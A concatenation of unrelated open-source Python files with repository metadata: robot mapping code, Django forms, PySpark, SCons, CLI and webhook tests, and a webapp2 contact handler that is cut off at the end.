frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,0, robot_trajectory, index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] R.append(d) box_print = [x + [0] for x in marker_map.tolist()] box_print[cluster][3] = 1 map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print) #map_renderer.plot_bricks_and_trajectory(mapa, R) ############################################ print("######################################") print("robot_estim_pos_vision: ", robot.position) print("######################################") marker_map_obj = [[110,0,0],[91,70,pi/2],[40,41,pi],[0,0,0]] obj = marker_map_obj[cluster[0]] print("robot_estim_pos_PID: ", robot.position) box_coords = [marker_list[cluster[0],1]*np.cos(marker_list[cluster[0],0]),marker_list[cluster[0],1]*np.sin(marker_list[cluster[0],0])] vel_wheels, hist = PID_control(estim_rob_pos, marker_map,box_coords, histeresis) if hist==0: return "PLACE_OBJECT_IN_THE_BOX",frame,{"ltrack_pos": new_ltrack_pos, "rtrack_pos" : new_rtrack_pos, "mapa" : mapa} robot.move(vel_wheels[0],vel_wheels[1]) return ("MOVE_TO_BOX_BY_VISION", frame, {"ltrack_pos": new_ltrack_pos, "rtrack_pos" : new_rtrack_pos, "histeresis" : hist, "cluster": cluster}) def place_object_in_the_box(robot,frame, ltrack_pos=0, rtrack_pos=0, P = np.identity(3), mapa = []): ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) # WHERE VTHE OPTICAL MARKERS ARE IN THE ENVIROMENT BB_legos=get_lego_boxes(frame) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,0, [], index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] #R.append(d) #map_renderer.plot_bricks_and_trajectory(mapa, R) ############################################ robot.move(vel_left=100,vel_right=100,time=2000) print("MOVING") robot.left_track.wait_until_not_moving(timeout=3000) robot.reset() robot.grip.wait_until_not_moving(timeout=3000) robot.move_straight(vel=-100,time=2000) robot.left_track.wait_until_not_moving(timeout=3000) robot.rotate_left(100,time=6000) robot.left_track.wait_until_not_moving(timeout=10000) print("finish") return "SELECT_AND_GO", frame, {"ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos,"R" : [], "mapa" : mapa} def camera_related(frame): arucoParams = aruco.DetectorParameters_create() mtx,dist = load_camera_params() image,marker_pos = get_marker_pose(frame, mtx, dist,arucoParams=arucoParams, marker_list=[0,1,2,3,4,5], markerLength = 3.3) #print("Output marco function:",marker_pos) return image,marker_pos with Robot(AsyncCamera(0)) as robot: robot.map = [(200, 0)] robot.sampling_rate = 0.1 print("These are the robot motor positions before planning:", robot.left_track.position, robot.right_track.position) # Define the state graph, we can do this better, currently each method # returns the next state name states = [ State( name="SEARCH_TARGET", act=search_target_with_Kalman_and_mapping, default_args={ "ltrack_pos": robot.left_track.position, "rtrack_pos": robot.right_track.position, "P" : np.identity(3), "delete_countdown" : 0, "mapa": [], "robot_trajectory": [], "feature_map" : [0] * 300 } ), State( name="SELECT_AND_GO", act=select_and_go, default_args={ "ltrack_pos": robot.left_track.position, "rtrack_pos": robot.right_track.position, "P" : np.identity(3), "mapa": [] } ), State( name="MOVE_TO_BRICK_BLIND_AND_GRIP", act=move_to_brick_blind_and_grip, default_args={"vel": 250, "t" : 1200, "ltrack_pos": robot.left_track.position, "rtrack_pos": robot.right_track.position, } ), State( name="GO_TO_BOX", act= A_star_move_to_box_blind, default_args={} ), State( name="MOVE_TO_BOX_BY_VISION", act= move_to_box_by_vision, default_args={} ), State( name="PLACE_OBJECT_IN_THE_BOX", act= place_object_in_the_box, default_args={} ) ] print(states[0]) state_dict = {} for state in states: state_dict[state.name] = state start_state = states[0] main_loop(robot, start_state, state_dict, delay=0)
TheCamusean/DLRCev3
scripts/benchmarks/demo3.py
Python
mit
27,312
0.028412
from rknfilter.targets import BaseTarget from rknfilter.db import Resource, Decision, CommitEvery from rknfilter.core import DumpFilesParser class StoreTarget(BaseTarget): def __init__(self, *args, **kwargs): super(StoreTarget, self).__init__(*args, **kwargs) self._dump_files_parser = DumpFilesParser() def process(self): commit = CommitEvery(self._session) for content, decision, domains, urls, ips, _ in self._dump_files_parser.get_data(): # TODO: move to models? resource = Resource.get_or_create(self._session, rkn_id=content['rkn_id']) if resource.id is None: resource.include_date = content['include_date'] resource.entry_type = content['entry_type'] resource.urgency_type = content['urgency_type'] resource.block_type = content['block_type'] resource.decision = Decision( date=decision['decision_date'], org=decision['decision_org'], num=decision['decision_num'] ) resource.sync_m2m_proxy('domains_list', domains) resource.sync_m2m_proxy('urls_list', urls) resource.sync_m2m_proxy('ips_list', ips) commit() commit(force=True)
DmitryFillo/rknfilter
rknfilter/targets/store.py
Python
bsd-2-clause
1,324
0.002266
from django import forms from django.contrib.auth.models import User as user_model from django.contrib.auth.forms import UserCreationForm from mc2.models import UserSettings class UserSettingsForm(forms.ModelForm): settings_level = forms.ChoiceField( choices=UserSettings.SETTINGS_LEVEL_CHOICES, widget=forms.RadioSelect()) class Meta: model = UserSettings fields = ('settings_level', ) class CreateAccountForm(UserCreationForm): """ Form for creating a new user account. """ first_name = forms.CharField(required=False) last_name = forms.CharField(required=False) email = forms.EmailField(required=True) def clean_email(self): ''' Validate that the supplied email address is unique for the site. ''' if user_model.objects.filter( email__iexact=self.cleaned_data['email']).exists(): raise forms.ValidationError('This email address is already in use.' ' Please supply a different' ' email address.') return self.cleaned_data['email']
praekelt/mc2
mc2/forms.py
Python
bsd-2-clause
1,161
0
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import sys from pyspark.rdd import PythonEvalType class PandasMapOpsMixin(object): """ Min-in for pandas map operations. Currently, only :class:`DataFrame` can use this class. """ def mapInPandas(self, func, schema): """ Maps an iterator of batches in the current :class:`DataFrame` using a Python native function that takes and outputs a pandas DataFrame, and returns the result as a :class:`DataFrame`. The function should take an iterator of `pandas.DataFrame`\\s and return another iterator of `pandas.DataFrame`\\s. All columns are passed together as an iterator of `pandas.DataFrame`\\s to the function and the returned iterator of `pandas.DataFrame`\\s are combined as a :class:`DataFrame`. Each `pandas.DataFrame` size can be controlled by `spark.sql.execution.arrow.maxRecordsPerBatch`. .. versionadded:: 3.0.0 Parameters ---------- func : function a Python native function that takes an iterator of `pandas.DataFrame`\\s, and outputs an iterator of `pandas.DataFrame`\\s. schema : :class:`pyspark.sql.types.DataType` or str the return type of the `func` in PySpark. The value can be either a :class:`pyspark.sql.types.DataType` object or a DDL-formatted type string. Examples -------- >>> from pyspark.sql.functions import pandas_udf >>> df = spark.createDataFrame([(1, 21), (2, 30)], ("id", "age")) >>> def filter_func(iterator): ... for pdf in iterator: ... yield pdf[pdf.id == 1] >>> df.mapInPandas(filter_func, df.schema).show() # doctest: +SKIP +---+---+ | id|age| +---+---+ | 1| 21| +---+---+ Notes ----- This API is experimental See Also -------- pyspark.sql.functions.pandas_udf """ from pyspark.sql import DataFrame from pyspark.sql.pandas.functions import pandas_udf assert isinstance(self, DataFrame) udf = pandas_udf( func, returnType=schema, functionType=PythonEvalType.SQL_MAP_PANDAS_ITER_UDF) udf_column = udf(*[self[col] for col in self.columns]) jdf = self._jdf.mapInPandas(udf_column._jc.expr()) return DataFrame(jdf, self.sql_ctx) def _test(): import doctest from pyspark.sql import SparkSession import pyspark.sql.pandas.map_ops globs = pyspark.sql.pandas.map_ops.__dict__.copy() spark = SparkSession.builder\ .master("local[4]")\ .appName("sql.pandas.map_ops tests")\ .getOrCreate() globs['spark'] = spark (failure_count, test_count) = doctest.testmod( pyspark.sql.pandas.map_ops, globs=globs, optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE | doctest.REPORT_NDIFF) spark.stop() if failure_count: sys.exit(-1) if __name__ == "__main__": _test()
wangmiao1981/spark
python/pyspark/sql/pandas/map_ops.py
Python
apache-2.0
3,806
0.002365
"""SCons.Tool.g++ Tool-specific initialization for g++. There normally shouldn't be any need to import this module directly. It will usually be imported through the generic SCons.Tool.Tool() selection method. """ # # Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "src/engine/SCons/Tool/g++.py 3842 2008/12/20 22:59:52 scons" import os.path import re import subprocess import SCons.Tool import SCons.Util cplusplus = __import__('c++', globals(), locals(), []) compilers = ['g++'] def generate(env): """Add Builders and construction variables for g++ to an Environment.""" static_obj, shared_obj = SCons.Tool.createObjBuilders(env) cplusplus.generate(env) env['CXX'] = env.Detect(compilers) # platform specific settings if env['PLATFORM'] == 'aix': env['SHCXXFLAGS'] = SCons.Util.CLVar('$CXXFLAGS -mminimal-toc') env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 1 env['SHOBJSUFFIX'] = '$OBJSUFFIX' elif env['PLATFORM'] == 'hpux': env['SHOBJSUFFIX'] = '.pic.o' elif env['PLATFORM'] == 'sunos': env['SHOBJSUFFIX'] = '.pic.o' # determine compiler version if env['CXX']: #pipe = SCons.Action._subproc(env, [env['CXX'], '-dumpversion'], pipe = SCons.Action._subproc(env, [env['CXX'], '--version'], stdin = 'devnull', stderr = 'devnull', stdout = subprocess.PIPE) if pipe.wait() != 0: return # -dumpversion was added in GCC 3.0. As long as we're supporting # GCC versions older than that, we should use --version and a # regular expression. #line = pipe.stdout.read().strip() #if line: # env['CXXVERSION'] = line line = pipe.stdout.readline() match = re.search(r'[0-9]+(\.[0-9]+)+', line) if match: env['CXXVERSION'] = match.group(0) def exists(env): return env.Detect(compilers)
makinacorpus/mapnik2
scons/scons-local-1.2.0/SCons/Tool/g++.py
Python
lgpl-2.1
3,111
0.0045
""" Unittests for gj2ascii CLI """ from __future__ import division import os import tempfile import unittest import click import emoji import fiona as fio import pytest import gj2ascii from gj2ascii import cli def test_complex(runner, expected_line_40_wide, line_file, compare_ascii): result = runner.invoke(cli.main, [ line_file, '--width', '40', '--char', '+', '--fill', '.', '--no-prompt', '--all-touched', '--iterate', '--crs', 'EPSG:26918' ]) assert result.exit_code == 0 assert compare_ascii(result.output, expected_line_40_wide) def test_bad_fill_value(runner, poly_file): result = runner.invoke(cli.main, ['-c toolong', poly_file]) assert result.exit_code != 0 assert result.output.startswith('Usage:') assert 'Error:' in result.output assert 'must be a single character' in result.output def test_bad_rasterize_value(runner, poly_file): result = runner.invoke(cli.main, ['-f toolong', poly_file]) assert result.exit_code != 0 assert result.output.startswith('Usage:') assert 'Error:' in result.output assert 'must be a single character' in result.output def test_render_one_layer_too_many_args(runner, poly_file): result = runner.invoke(cli.main, [ poly_file, '--char', '-', '--char', '8' ]) assert result.exit_code != 0 assert result.output.startswith('Error:') assert 'number' in result.output assert '--char' in result.output def test_different_width(runner, poly_file): fill = '+' value = '.' width = 62 result = runner.invoke(cli.main, [ '--width', width, poly_file, '--fill', fill, '--char', value, '--no-prompt' ]) assert result.exit_code == 0 for line in result.output.rstrip(os.linesep).splitlines(): if line.startswith((fill, value)): assert len(line.rstrip(os.linesep).split()) == width / 2 def test_iterate_wrong_arg_count(runner, poly_file): result = runner.invoke(cli.main, [ poly_file, '--iterate', '--char', '1', '--char', '2' ]) assert result.exit_code != 0 assert result.output.startswith('Error:') assert 'arg' in result.output assert 'layer' in result.output def test_bbox(runner, poly_file, small_aoi_poly_line_file, compare_ascii): expected = os.linesep.join([ ' + + + +', ' + + +', ' + +', ' +', '+ +', '+ + +', '+ + +', '+ +', '+ + +', ' + +', ' + + +', ' + + + +', ' + + + + +', ' + + + + + +', ' + + + + + + +', '' ]) with fio.open(small_aoi_poly_line_file) as src: cmd = [ poly_file, '--width', '40', '--char', '+', '--bbox', ] + list(map(str, src.bounds)) result = runner.invoke(cli.main, cmd) assert result.exit_code == 0 assert compare_ascii(result.output.strip(), expected.strip()) def test_exceed_auto_generate_colormap_limit(runner, poly_file): infiles = [poly_file for i in range(len(gj2ascii.ANSI_COLORMAP.keys()) + 2)] result = runner.invoke(cli.main, infiles) assert result.exit_code != 0 assert result.output.startswith('Error:') assert 'auto' in result.output assert 'generate' in result.output assert '--char' in result.output def test_default_char_map(runner, poly_file, compare_ascii): with fio.open(poly_file) as src: expected = gj2ascii.render(src) result = runner.invoke(cli.main, [ poly_file ]) assert result.exit_code == 0 assert compare_ascii(result.output.strip(), expected.strip()) def test_same_char_twice(runner, poly_file, line_file, compare_ascii): width = 40 fill = '.' char = '+' with fio.open(poly_file) as poly, fio.open(line_file) as line: coords = list(poly.bounds) + list(line.bounds) bbox = (min(coords[0::4]), min(coords[1::4]), max(coords[2::4]), max(coords[3::4])) expected = gj2ascii.render_multiple( [(poly, char), (line, char)], width=width, fill=fill, bbox=bbox) result = runner.invoke(cli.main, [ poly_file, line_file, '--width', width, '--char', char, '--char', char, '--fill', fill ]) assert result.exit_code == 0 assert compare_ascii(expected, result.output) def test_iterate_bad_property(runner, single_feature_wv_file): result = runner.invoke(cli.main, [ single_feature_wv_file, '--iterate', '--properties', 'bad-prop' ]) assert result.exit_code != 0 assert isinstance(result.exception, KeyError) def test_styled_write_to_file(runner, single_feature_wv_file, compare_ascii): with fio.open(single_feature_wv_file) as src: expected = gj2ascii.render(src, width=20, char='1', fill='0') with tempfile.NamedTemporaryFile('r+') as f: result = runner.invoke(cli.main, [ single_feature_wv_file, '--width', '20', '--properties', 'NAME,ALAND', '--char', '1=red', '--fill', '0=blue', '--outfile', f.name ]) f.seek(0) assert result.exit_code == 0 assert result.output == '' assert compare_ascii(f.read().strip(), expected.strip()) def test_stack_too_many_args(runner, multilayer_file): result = runner.invoke(cli.main, [ multilayer_file + ',polygons,lines', '--char', '+', '--char', '8', '--char', '0' # 2 layers but 3 values ]) assert result.exit_code != 0 assert result.output.startswith('Error:') assert '--char' in result.output assert 'number' in result.output assert 'equal' in result.output def test_iterate_too_many_layers(runner, multilayer_file): result = runner.invoke(cli.main, [ multilayer_file, '--iterate', '--no-prompt' ]) assert result.exit_code != 0 assert result.output.startswith('Error:') assert 'single layer' in result.output def test_multilayer_compute_colormap(runner, multilayer_file, compare_ascii): coords = [] for layer in ('polygons', 'lines'): with fio.open(multilayer_file, layer=layer) as src: coords += list(src.bounds) bbox = min(coords[0::4]), min(coords[1::4]), max(coords[2::4]), max(coords[3::4]) rendered_layers = [] for layer, char in zip(('polygons', 'lines'), ('0', '1')): with fio.open(multilayer_file, layer=layer) as src: rendered_layers.append( gj2ascii.render(src, width=20, fill=' ', char=char, bbox=bbox)) expected = gj2ascii.stack(rendered_layers) # Explicitly define since layers are not consistently listed in order result = runner.invoke(cli.main, [ multilayer_file + ',polygons,lines', '--width', '20' ]) assert result.exit_code == 0 assert compare_ascii(expected.strip(), result.output.strip()) def test_stack_layers(runner, multilayer_file, compare_ascii): expected = os.linesep.join([ '. + . . . . . . . . . . . + . . . . . .', '. + + + . . . . . . . . . . . . . . . .', '. . 8 8 8 8 8 8 8 . . . . 8 . . . . . .', '. . . 8 . . . . . . . . . 8 . . . . . .', '. . . . 8 . . . . + . . . . 8 . . . . .', '. . . . . 8 . . . + + . . . 8 . . . . .', '. . . . . . 8 . . + + + + . 8 . . . . .', '. . . . . 8 . . . . + + + + . 8 . . . .', '. . . . 8 . . . . . . 8 8 8 . 8 . . + .', '+ + + . 8 . . . 8 8 8 . + + . . 8 + + +', '+ + + 8 . . . . . . . . . . . . 8 + + +', '. . 8 . . . 8 . . + . . . . . . 8 + + .', '. . . 8 . . 8 8 + + . . . . . . . 8 + .', '. . . . 8 . 8 + 8 + . . . . . . . 8 + .', '. . . . 8 8 + + 8 + . . . . . . . . . .', '. . . . . 8 + + + 8 . . . . . . . . . .', '. . . . . . . . + + . . . . . . . . . .' ]) result = runner.invoke(cli.main, [ multilayer_file + ',polygons,lines', '--char', '+', '--char', '8', '--fill', '.', '--width', '40' ]) assert result.exit_code == 0 assert compare_ascii(result.output.strip(), expected) def test_write_to_file(runner, single_feature_wv_file, compare_ascii): expected = os.linesep.join([ '+-------+-----------+', '| NAME | Barbour |', '| ALAND | 883338808 |', '+-------+-----------+', '* * * * * * * * * *', '* * * * * * * * * *', '* * * + + + * + + +', '* * + + + + + + * *', '+ + + + + + * * * *', '+ + + + + * * * * *' ]) with tempfile.NamedTemporaryFile('r+') as f: result = runner.invoke(cli.main, [ single_feature_wv_file, '--width', '20', '--properties', 'NAME,ALAND', '--iterate', '--fill', '*', '--outfile', f.name # --no-prompt should automatically happen in this case ]) f.seek(0) assert result.exit_code == 0 assert result.output == '' assert compare_ascii( f.read().strip(), expected) @pytest.mark.xfail( os.environ.get('TRAVIS', '').lower() == 'true', reason='Failing on Travis for an unknown reason.') def test_paginate_with_all_properties( runner, expected_all_properties_output, single_feature_wv_file, compare_ascii): result = runner.invoke(cli.main, [ single_feature_wv_file, '--width', '20', '--properties', '%all', '--iterate', '--no-prompt' ]) assert result.exit_code == 0 assert compare_ascii(result.output, expected_all_properties_output) @pytest.mark.xfail( os.environ.get('TRAVIS', '').lower() == 'true', reason='Failing on Travis for an unknown reason.') def test_paginate_with_two_properties( runner, expected_two_properties_output, single_feature_wv_file, compare_ascii): result = runner.invoke(cli.main, [ single_feature_wv_file, '--width', '20', '--fill', '*', '--properties', 'NAME,ALAND', '--iterate', '--no-prompt' ]) assert result.exit_code == 0 assert compare_ascii(result.output, expected_two_properties_output) def test_simple(runner, expected_polygon_40_wide, poly_file, compare_ascii): result = runner.invoke(cli.main, [ poly_file, '--width', '40', '--char', '+', '--fill', '.', ]) assert result.exit_code == 0 assert compare_ascii(result.output.strip(), expected_polygon_40_wide) def test_cb_char_and_fill(): testvals = { 'a': [('a', None)], ('a', 'b'): [('a', None), ('b', None)], 'black': [(gj2ascii.DEFAULT_COLOR_CHAR['black'], 'black')], ('black', 'blue'): [ (gj2ascii.DEFAULT_COLOR_CHAR['black'], 'black'), (gj2ascii.DEFAULT_COLOR_CHAR['blue'], 'blue') ], ('+=red', '==yellow'): [('+', 'red'), ('=', 'yellow')], None: [] } # The callback can return a list of tuples or a list of lists. Force test to compare # list to list. for inval, expected in testvals.items(): expected = [list(i) for i in expected] actual = [list(i) for i in cli._cb_char_and_fill(None, None, inval)] assert expected == actual with pytest.raises(click.BadParameter): cli._cb_char_and_fill(None, None, 'bad-color') with pytest.raises(click.BadParameter): cli._cb_char_and_fill(None, None, ('bad-color')) def test_cb_properties(): for v in ('%all', None): assert v == cli._cb_properties(None, None, v) props = 'PROP1,PROP2,PROP3' assert props.split(',') == cli._cb_properties(None, None, props) def test_cb_multiple_default(): values = ('1', '2') assert values == cli._cb_multiple_default(None, None, values) values = '1' assert (values) == cli._cb_multiple_default(None, None, values) def test_cb_bbox(poly_file): with fio.open(poly_file) as src: assert None == cli._cb_bbox(None, None, None) assert src.bounds == cli._cb_bbox(None, None, src.bounds) # Bbox with invalid X values with pytest.raises(click.BadParameter): cli._cb_bbox(None, None, (2, 0, 1, 0,)) # Bbox with invalid Y values with pytest.raises(click.BadParameter): cli._cb_bbox(None, None, (0, 2, 0, 1)) # Bbox with invalid X and Y values with pytest.raises(click.BadParameter): cli._cb_bbox(None, None, (2, 2, 1, 1,)) def test_with_emoji(runner, poly_file, line_file): result = runner.invoke(cli.main, [ poly_file, line_file, '-c', ':water_wave:', '-c', ':+1:' ]) assert result.exit_code is 0 for c in (':water_wave:', ':+1:'): ucode = emoji.unicode_codes.EMOJI_ALIAS_UNICODE[c] assert ucode in result.output def test_no_style(runner, expected_polygon_40_wide, poly_file, compare_ascii): result = runner.invoke(cli.main, [ poly_file, '-c', '+', '--no-style', '-w', '40', '-f', '.' ]) assert result.exit_code is 0 assert compare_ascii(result.output.strip(), expected_polygon_40_wide) def test_print_colors(runner): result = runner.invoke(cli.main, [ '--colors' ]) assert result.exit_code is 0 for color in gj2ascii.DEFAULT_COLOR_CHAR.keys(): assert color in result.output
geowurster/gj2ascii
tests/test_cli.py
Python
bsd-3-clause
13,853
0.000361
from __future__ import print_function from BinPy.connectors.connector import * from BinPy.gates.tree import * from BinPy.connectors.connector import * from BinPy.gates.gates import * from BinPy.combinational.combinational import * from nose.tools import with_setup, nottest ''' Testing backtrack() function for depths from 0 to 4. ''' def get_tree_for_depth_checking(depth): # Gates for depth test g1 = AND(True, False) g2 = AND(True, False) g3 = AND(g1, g2) g4 = AND(True, False) g5 = AND(True, False) g6 = AND(g4, g5) g_final = AND(g3, g6) # Instance of Tree tree_inst = Tree(g_final, depth) tree_inst.backtrack() # Testing tree n1 = (g1, [True, False]) n2 = (g2, [True, False]) n4 = (g4, [True, False]) n5 = (g5, [True, False]) n3 = (g3, [n1, n2]) n6 = (g6, [n4, n5]) tree_testing = (g_final, [n3, n6]) return tree_inst, tree_testing def compare_trees(tree_inst, tree_testing, depth): if isinstance(tree_testing, tuple): if not tree_testing[0] == tree_inst.element: assert False if depth == 0: if len(tree_inst.sons) != 0: assert False else: for i in range(len(tree_testing[1])): compare_trees(tree_inst.sons[i], tree_testing[1][i], depth - 1) else: if not tree_testing == tree_inst.element: assert False def backtrack_depth_test(): for i in range(6): tree_inst, tree_testing = get_tree_for_depth_checking(i) compare_trees(tree_inst, tree_testing, i) ''' Test to see if the set_depth method works ''' def set_depth_test(): tree_inst, tree_testing = get_tree_for_depth_checking(0) for i in range(1, 6): tree_inst.set_depth(i) tree_inst.backtrack() compare_trees(tree_inst, tree_testing, i) ''' Test not following Cycles functionality ''' def not_following_cycles_test(): c1 = Connector(True) g1 = AND(c1, True) g2 = AND(g1, False) g2.set_output(c1) t_no_cycle = Tree(g2, 5, False) t_cycle = Tree(g2, 5, True) t_no_cycle.backtrack() t_cycle.backtrack() assert t_no_cycle.sons[0].sons[0].sons[0].sons == [] assert t_cycle.sons[0].sons[0].sons[0].sons[0].element == g1
daj0ker/BinPy
BinPy/tests/tree_tests.py
Python
bsd-3-clause
2,286
0.000875
from django.conf import settings from zerver.lib.test_classes import WebhookTestCase from zerver.models import get_realm, get_system_bot class HelloWorldHookTests(WebhookTestCase): STREAM_NAME = "test" URL_TEMPLATE = "/api/v1/external/helloworld?&api_key={api_key}&stream={stream}" PM_URL_TEMPLATE = "/api/v1/external/helloworld?&api_key={api_key}" WEBHOOK_DIR_NAME = "helloworld" # Note: Include a test function per each distinct message condition your integration supports def test_hello_message(self) -> None: expected_topic = "Hello World" expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Marilyn Monroe](https://en.wikipedia.org/wiki/Marilyn_Monroe)**" # use fixture named helloworld_hello self.check_webhook( "hello", expected_topic, expected_message, content_type="application/x-www-form-urlencoded", ) def test_goodbye_message(self) -> None: expected_topic = "Hello World" expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**" # use fixture named helloworld_goodbye self.check_webhook( "goodbye", expected_topic, expected_message, content_type="application/x-www-form-urlencoded", ) def test_pm_to_bot_owner(self) -> None: # Note that this is really just a test for check_send_webhook_message self.URL_TEMPLATE = self.PM_URL_TEMPLATE self.url = self.build_webhook_url() expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**" self.send_and_test_private_message( "goodbye", expected_message=expected_message, content_type="application/x-www-form-urlencoded", ) def test_stream_error_pm_to_bot_owner(self) -> None: # Note that this is really just a test for check_send_webhook_message self.STREAM_NAME = "nonexistent" self.url = self.build_webhook_url() realm = get_realm("zulip") notification_bot = get_system_bot(settings.NOTIFICATION_BOT, realm.id) expected_message = "Your bot `webhook-bot@zulip.com` tried to send a message to stream #**nonexistent**, but that stream does not exist. Click [here](#streams/new) to create it." self.send_and_test_private_message( "goodbye", expected_message=expected_message, content_type="application/x-www-form-urlencoded", sender=notification_bot, ) def test_custom_topic(self) -> None: # Note that this is really just a test for check_send_webhook_message expected_topic = "Custom Topic" self.url = self.build_webhook_url(topic=expected_topic) expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**" self.check_webhook( "goodbye", expected_topic, expected_message, content_type="application/x-www-form-urlencoded", )
rht/zulip
zerver/webhooks/helloworld/tests.py
Python
apache-2.0
3,346
0.002092
# -*- coding: utf-8 -*- """ A real simple app for using webapp2 with auth and session. It just covers the basics. Creating a user, login, logout and a decorator for protecting certain handlers. Routes are setup in routes.py and added in main.py """ # standard library imports import logging # related third party imports import webapp2 from google.appengine.ext import ndb from google.appengine.api import taskqueue from webapp2_extras.auth import InvalidAuthIdError, InvalidPasswordError from webapp2_extras.i18n import gettext as _ from bp_includes.external import httpagentparser # local application/library specific imports import bp_includes.lib.i18n as i18n from bp_includes.lib.basehandler import BaseHandler from bp_includes.lib.decorators import user_required from bp_includes.lib import captcha, utils import bp_includes.models as models_boilerplate import forms as forms from google.appengine.api import memcache from google.appengine.api import channel import random import logging logger = logging.getLogger(__name__) class ContactHandler(BaseHandler): """ Handler for Contact Form """ def get(self): """ Returns a simple HTML for contact form """ if self.user: user_info = self.user_model.get_by_id(long(self.user_id)) if user_info.name or user_info.last_name: self.form.name.data = user_info.name + " " + user_info.last_name if user_info.email: self.form.email.data = user_info.email params = { "exception": self.request.get('exception') } return self.render_template('contact.html', **params) def post(self): """ validate contact form """ if not self.form.validate(): return self.get() remote_ip = self.request.remote_addr city = i18n.get_city_code(self.request) region = i18n.get_region_code(self.request) country = i18n.get_country_code(self.request) coordinates = i18n.get_city_lat_long(self.request) user_agent = self.request.user_agent exception = self.request.POST.get('exception') name = self.form.name.data.strip() email = self.form.email.data.lower() message = self.form.message.data.strip() template_val = {} try: # parsing user_agent and getting which os key to use # windows uses 'os' while other os use 'flavor' ua = httpagentparser.detect(user_agent) _os = ua.has_key('flavor') and 'flavor' or 'os' operating_system = str(ua[_os]['name']) if "name" in ua[_os] else "-" if 'version' in ua[_os]: operating_system += ' ' + str(ua[_os]['version']) if 'dist' in ua: operating_system += ' ' + str(ua['dist']) browser = str(ua['browser']['name']) if 'browser' in ua else "-" browser_version = str(ua['browser']['version']) if 'browser' in ua else "-" template_val = { "name": name, "email": email, "ip": remote_ip, "city": city, "region": region, "country": country, "coordinates": coordinates, "browser": browser, "browser_version": browser_version, "operating_system": operating_system, "message": message } except Exception as e: logging.error("error getting user agent info: %s" % e) try: subject = _("Contact") + " " + self.app.config.get('app_name') # exceptions for error pages that redirect to contact if exception != "": subject = "{} (Exception error: {})".format(subject, exception) body_path = "emails/contact.txt" body = self.jinja2.render_template(body_path, **template_val) email_url = self.uri_for('taskqueue-send-email') taskqueue.add(url=email_url, params={ 'to': self.app.config.get('contact_recipient'), 'subject': subject, 'body': body, 'sender': self.app.config.get('contact_sender'), }) message = _('Your message was sent successfully.') self.add_message(message, 'success') return self.redirect_to('contact') except (AttributeError, KeyError), e: logging.error('Error sending contact form: %s' % e) message = _('Error sending the message. Please try again later.') self.add_message(message, 'error') return self.redirect_to('contact') @webapp2.cached_property def form(self): return 